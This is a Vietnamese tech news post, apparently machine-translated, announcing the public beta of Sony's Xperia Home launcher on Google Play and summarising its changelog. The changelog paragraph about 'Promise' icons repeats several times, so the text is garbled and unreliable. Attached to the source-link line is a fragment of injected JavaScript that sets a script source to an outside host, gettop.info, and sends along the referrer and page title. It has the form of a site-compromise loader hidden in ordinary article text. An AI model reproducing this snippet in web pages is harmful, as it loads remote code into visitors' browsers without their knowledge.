Sony Xperia Home beta đã có trên Google Play

Ngày đăng: 10:36 sáng

Sony đã làm việc trên Xperia Home trong vài năm nay, nhưng ứng dụng này chỉ có sẵn cho những ai tham gia phiên bản beta. Tin vui là bắt đầu từ ngày hôm nay, bất kỳ ai có quyền truy cập Cửa hàng Google Play đều có thể tải xuống Trang chủ Sony Xperia.

Sony Xperia Home beta

Ứng dụng vẫn đang trong giai đoạn beta, nhưng ít nhất bạn sẽ có một cách nhanh nhất và nhanh nhất để tải xuống và cài đặt ứng dụng đó trên điện thoại thông minh của bạn. Cùng với việc phát hành Xperia Home launcher trong Cửa hàng Google Play, Sony cũng đã cung cấp nó cho các điện thoại thông minh Xperia bổ sung.

Trang chủ Xperia chỉ dành cho điện thoại thông minh cao cấp của Sony, nhưng bản cập nhật mới nhất làm cho nó tương thích với các thiết bị khác như Xperia A1 , Xperia XA1 Ultra, Xperia XZs và Xperia XZ Premium.

Phiên bản beta mới nhất của Sony Xperia Home bao gồm một vài cải tiến so với các lần lặp lại trước đó như một hình ảnh động khởi động mới, trình đơn cài đặt được tổ chức lại, cũng như các biểu tượng sân khấu phù hợp với lưới máy tính để bàn.

Changelog cũng đề cập rằng các biểu tượng Promise sẽ được hiển thị khi cài đặt ứng dụng. Tuy nhiên, có hai hạn chế được biết đến với các biểu tượng Hứa hẹn này vì hiện tại, không thể di chuyển biểu tượng lời hứa trong khi ứng dụng đang được tải xuống. Hơn nữa, đồ họa biểu tượng sẽ không khả dụng khi cài đặt do sự cố với Google Play. Changelog cũng đề cập rằng các biểu tượng Promise sẽ được hiển thị khi cài đặt ứng dụng.

 

Tuy nhiên, có hai hạn chế được biết đến với các biểu tượng Hứa hẹn này vì hiện tại, không thể di chuyển biểu tượng lời hứa trong khi ứng dụng đang được tải xuống. Hơn nữa, đồ họa biểu tượng sẽ không khả dụng khi cài đặt do sự cố với Google Play. Changelog cũng đề cập rằng các biểu tượng Promise sẽ được hiển thị khi cài đặt ứng dụng. Tuy nhiên, có hai hạn chế được biết đến với các biểu tượng Hứa hẹn này vì hiện tại, không thể di chuyển biểu tượng lời hứa trong khi ứng dụng đang được tải xuống. Hơn nữa, đồ họa biểu tượng sẽ không khả dụng khi cài đặt do sự cố với Google Play.

Nguồn: http://www.phonearena.com/news/Sony-Xperia-Home-beta-now-available-on-the-Google-Play_id94716} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

Tin liên quan

Tình trạng Samsung J7 bị lỗi sọc màn hình có khắc phục được
Tháng Năm 12, 2017 oanhoanh